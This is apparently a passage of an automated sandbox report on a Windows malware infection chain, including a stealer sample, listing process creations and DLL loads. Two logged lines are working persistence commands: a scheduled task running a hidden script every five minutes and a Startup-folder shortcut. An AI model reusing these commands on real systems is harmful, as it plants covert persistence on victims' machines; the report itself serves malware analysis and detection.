                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: windowscodecs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: dlnashext.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: wpdshext.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeSection loaded: iertutil.dll
